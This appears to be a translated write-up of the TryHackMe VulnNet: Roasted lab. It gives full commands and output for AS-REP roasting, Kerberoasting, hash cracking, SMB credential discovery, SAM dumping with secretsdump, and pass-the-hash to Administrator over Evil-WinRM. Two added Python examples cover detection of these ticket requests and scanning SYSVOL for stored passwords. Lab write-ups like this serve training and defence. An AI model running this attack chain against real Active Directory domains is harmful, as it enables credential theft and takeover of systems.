Parts are masked with ■.
…Well, honestly, I had no idea at all, so I'm devouring the writeups.
Writeups
- vulnnet_roasted/README.md at main · siddicky/vulnnet_roasted · GitHub
- TryHackMe | VulnNet:Roasted. A room on TryHackMe created by… | by FarisArch | May, 2021 | Medium
- VulnNet: Roasted writeup. I state that in this writeup the… | by prv | May, 2021 | Medium
- VulnNet : roasted – Write Up – Fr – TryHackMe
- Tryhackme/VulnNet: Roasted.md at main · thedz34/Tryhackme · GitHub
- Tryhackme-Writeups/VulnNet_Roasted Writeup at main · kartikeyj96/Tryhackme-Writeups · GitHub
- TryHackMe VulnNet - Roasted Writeup | sidchn
- write-ups/VulnNet-Roasted.md at main · r3vshell/write-ups · GitHub
- [THM] VulnNet: Roated – Blog
All I understood is "when you see this kind of information, you try this."
Honestly, I don't understand any of it.
Stage 1: Steal a user's credentials
First, nmap
$ nmap -sC -sV -Pn -n -A $IP
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-01 22:24 JST
Nmap scan report for 10.10.240.239
Host is up (0.33s latency).
Not shown: 989 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-06-01 13:24:57Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-06-01T13:25:27
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.74 seconds
kerberos, ldap, ds, smb, … there's a lot here…
After scanning and poking around, it looks like an attack on Kerberos authentication is what works here.
kerberos
First, pull the list of users.
$ python3 /usr/share/doc/python3-impacket/examples/lookupsid.py anonymous@$IP
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Brute forcing SIDs at 10.10.240.239
[*] StringBinding ncacn_np:10.10.240.239[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)
Extract the usernames from this and go for an ASREPRoast attack.
Take the names marked (SidTypeUser), save them as users.txt, and request the password hashes.
$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py 'VULNNET-RST/' -usersfile users.txt -no-pass -dc-ip $IP
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@VULNNET-RST:7057a29e0bbc2de8f9699fa612ecc405$7dd804....
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
I see, so that's how you get it. Crack it with John the Ripper.
$ john hash.txt --wordlist=/usr/share/dirb/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
■■■■■■■■■        ($krb5asrep$23$t-skid@VULNNET-RST)
1g 0:00:00:05 DONE (2021-06-01 23:45) 0.1934g/s 614796p/s 614796c/s 614796C/s tjallin3..tj021502
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Out it comes… so from here, Kerberoasting?
$ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py 'VULNNET-RST.local/t-skid:■■■■■■' -outputfile kerb.hash -dc-ip $IP
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName    Name                MemberOf                                                       PasswordLastSet             LastLogon                   Delegation
----------------------  ------------------  -------------------------------------------------------------  --------------------------  --------------------------  ----------
CIFS/vulnnet-rst.local  enterprise-core-vn  CN=Remote Management Users,CN=Builtin,DC=vulnnet-rst,DC=local  2021-03-12 04:45:09.913979  2021-03-14 08:41:17.987528
Something came out. A hash appears again, so crack it with John.
$ john kerb.hash --wordlist=/usr/share/dirb/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
■■■■■■■■■■■      (?)
1g 0:00:00:03 DONE (2021-06-01 23:59) 0.2906g/s 1194Kp/s 1194Kc/s 1194KC/s ryan2k8..ry=i;iiI
Use the "--show" option to display all of the cracked passwords reliably
Session completed
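As an added example that is not part of this post, here is the defender's side of the two steps above. The AS-REP hash came from an account with Kerberos pre-authentication disabled, and the Kerberoast hash from an RC4 (etype 23) service ticket; on the domain controller both show up in the Security log as 4768/4769 events. This Python snippet classifies such records; the records, the client IP addresses and the already-parsed field layout are constructed assumptions.

```python
# Added example (not from the original post): flag the two ticket-request
# patterns exploited above, from constructed Security-log records (4768/4769).
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23, the type both cracked hashes above are tagged with

def classify(ev):
    """Label one 4768/4769 record as AS-REP roasting, Kerberoasting, or None."""
    etype = ev.get("TicketEncryptionType")
    if ev["EventID"] == 4768 and ev.get("PreAuthType") == 0 and etype == RC4_HMAC:
        # TGT handed out with no pre-authentication: the account is AS-REP roastable
        return "asrep_roast", ev["TargetUserName"]
    if ev["EventID"] == 4769 and etype == RC4_HMAC:
        svc = ev["ServiceName"]
        # RC4 service ticket for a user-held SPN (machine accounts end in $,
        # krbtgt is the ticket-granting service itself, so both are excluded)
        if not svc.endswith("$") and svc.lower() != "krbtgt":
            return "kerberoast", svc
    return None

def analyze(events):
    """Return (findings by label -> [(account, client_ip)], RC4 4769 count per client)."""
    findings = defaultdict(list)
    rc4_tgs_per_ip = defaultdict(int)   # a burst from one client is the usual Kerberoast signal
    for ev in events:
        if ev["EventID"] == 4769 and ev.get("TicketEncryptionType") == RC4_HMAC:
            rc4_tgs_per_ip[ev["IpAddress"]] += 1
        hit = classify(ev)
        if hit:
            label, account = hit
            findings[label].append((account, ev["IpAddress"]))
    return dict(findings), dict(rc4_tgs_per_ip)

# Constructed sample. Real event XML carries these fields as hex strings ("0x17");
# here they are already parsed to ints. 10.10.14.5 / 10.10.240.50 are made-up clients.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "t-skid", "PreAuthType": 0,
     "TicketEncryptionType": 0x17, "IpAddress": "10.10.14.5"},
    {"EventID": 4768, "TargetUserName": "a-whitehat", "PreAuthType": 2,
     "TicketEncryptionType": 0x12, "IpAddress": "10.10.240.50"},
    {"EventID": 4769, "TargetUserName": "t-skid@VULNNET-RST.LOCAL", "ServiceName": "enterprise-core-vn",
     "TicketEncryptionType": 0x17, "IpAddress": "10.10.14.5"},
    {"EventID": 4769, "TargetUserName": "t-skid@VULNNET-RST.LOCAL", "ServiceName": "WIN-2BO8M1OE1M1$",
     "TicketEncryptionType": 0x12, "IpAddress": "10.10.14.5"},
    {"EventID": 4769, "TargetUserName": "a-whitehat@VULNNET-RST.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": 0x17, "IpAddress": "10.10.240.50"},
]

if __name__ == "__main__":
    print(analyze(SAMPLE_EVENTS))
```

The two fixes the findings point at are clearing "Do not require Kerberos preauthentication" on t-skid and moving SPN-holding accounts to long random passwords (or gMSAs) with AES-only encryption types.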
I seriously don't know what I'm doing.
Let's log in and get the flag.
$ /opt/evil-winrm/evil-winrm.rb -i $IP -u 'enterprise-core-vn' -p '■■■■■■■■■■'

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

dir
ls
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Desktop> ls

    Directory: C:\Users\enterprise-core-vn\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/13/2021   3:43 PM             39 user.txt

*Evil-WinRM* PS C:\Users\enterprise-core-vn\Desktop> cat user.txt
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
ok.
Stage 2: Find other users
With the newly obtained credentials, more information can be pulled out over SMB.
$ smbmap -H $IP -u 'enterprise-core-vn' -p '■■■■■■■■■■■■'
[+] IP: 10.10.240.239:445    Name: 10.10.240.239
        Disk                                    Permissions    Comment
        ----                                    -----------    -------
        ADMIN$                                  NO ACCESS      Remote Admin
        C$                                      NO ACCESS      Default share
        IPC$                                    READ ONLY      Remote IPC
        NETLOGON                                READ ONLY      Logon server share
        SYSVOL                                  READ ONLY      Logon server share
        VulnNet-Business-Anonymous              READ ONLY      VulnNet Business Sharing
        VulnNet-Enterprise-Anonymous            READ ONLY      VulnNet Enterprise Sharing
Let's get in over SMB.
$ smbclient //$IP/SYSVOL --user=enterprise-core-vn%■■■■■■■■■■■■■
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Mar 12 04:19:49 2021
  ..                                  D        0  Fri Mar 12 04:19:49 2021
  vulnnet-rst.local                  Dr        0  Fri Mar 12 04:19:49 2021

                8771839 blocks of size 4096. 4521966 blocks available
smb: \> pwd
Current directory is \\10.10.240.239\SYSVOL\
smb: \> cd vulnnet-rst.local
smb: \vulnnet-rst.local\> dir
  .                                   D        0  Fri Mar 12 04:23:40 2021
  ..                                  D        0  Fri Mar 12 04:23:40 2021
  DfsrPrivate                      DHSr        0  Fri Mar 12 04:23:40 2021
  Policies                            D        0  Fri Mar 12 04:20:26 2021
  scripts                             D        0  Wed Mar 17 08:15:49 2021

                8771839 blocks of size 4096. 4521966 blocks available
smb: \vulnnet-rst.local\> cd scripts
smb: \vulnnet-rst.local\scripts\> dir
  .                                   D        0  Wed Mar 17 08:15:49 2021
  ..                                  D        0  Wed Mar 17 08:15:49 2021
  ResetPassword.vbs                   A     2821  Wed Mar 17 08:18:14 2021

                8771839 blocks of size 4096. 4521886 blocks available
smb: \vulnnet-rst.local\scripts\> more ResetPassword.vbs
strUserNTName = "a-whitehat"
strPassword = "■■■■■■■■■■■■■■■■"
Another user's credentials are written right in the script…
With these, the SAM database can be dumped… why…
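An added example, not from the post: SYSVOL is replicated to every domain controller and readable by all authenticated users, so a password literal in a logon script there is effectively shared with the whole domain. This Python snippet audits a local copy of SYSVOL for password assignments in scripts and for Group Policy Preferences cpassword attributes, reporting hits with the value redacted. The directory tree it builds is a constructed miniature of the layout seen above; every file name other than ResetPassword.vbs is an assumption.

```python
# Added example (not from the original post): find credential literals in a
# SYSVOL copy, the hygiene check that would have caught ResetPassword.vbs.
import re
import tempfile
from pathlib import Path

SCRIPT_SUFFIXES = {".vbs", ".ps1", ".bat", ".cmd", ".xml"}
# Assignment-style password literals (VBScript/PowerShell/batch) and GPP cpassword attributes.
PASSWORD_RE = re.compile(
    r'(?i)(?:\b\w*(?:password|passwd|pwd)\w*\s*=\s*"([^"]+)"'      # strPassword = "..."
    r'|\$\w*(?:password|pwd)\w*\s*=\s*[\'"]([^\'"]+)[\'"]'          # $svcPassword = '...'
    r'|cpassword="([^"]+)")'                                        # Groups.xml (GPP)
)

def scan_sysvol(root):
    """Return (relative_path, line_number, redacted_line) for each credential literal found."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.suffix.lower() not in SCRIPT_SUFFIXES or not path.is_file():
            continue
        for n, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
            m = PASSWORD_RE.search(line)
            if m:
                secret = next(g for g in m.groups() if g)   # first populated capture group
                redacted = line.replace(secret, "<redacted>").strip()
                hits.append((path.relative_to(root).as_posix(), n, redacted))
    return hits

def demo():
    """Build a constructed miniature of the SYSVOL tree seen above and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        scripts = Path(tmp, "vulnnet-rst.local", "scripts")
        scripts.mkdir(parents=True)
        (scripts / "ResetPassword.vbs").write_text('strUserNTName = "a-whitehat"\nstrPassword = "S3cret!"\n')
        (scripts / "logon.bat").write_text("@echo off\nnet use Z: \\\\fileserver\\share\n")   # clean
        (scripts / "svc.ps1").write_text("$svcUser = 'svc-backup'\n$svcPassword = 'Winter2021!'\n")
        gpp = Path(tmp, "vulnnet-rst.local", "Policies", "example-gpo", "Machine", "Preferences", "Groups")
        gpp.mkdir(parents=True)
        (gpp / "Groups.xml").write_text('<Properties userName="svc" cpassword="AbCdEf=="/>\n')
        return scan_sysvol(tmp)

if __name__ == "__main__":
    for hit in demo():
        print(hit)
```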
$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py a-whitehat@$IP
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:■■■■■■■■■■■■■■■■■■■■■:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
With this, we can connect as Administrator.
$ /opt/evil-winrm/evil-winrm.rb -i $IP -u Administrator -H ■■■■■■■■■■■■■■■■■■■■■

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/13/2021   3:34 PM             39 system.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat system.txt
■■■■■■■■■■■■■■■■■■■■■■
I had far too little background knowledge, but I wrote this down as a record of the trail.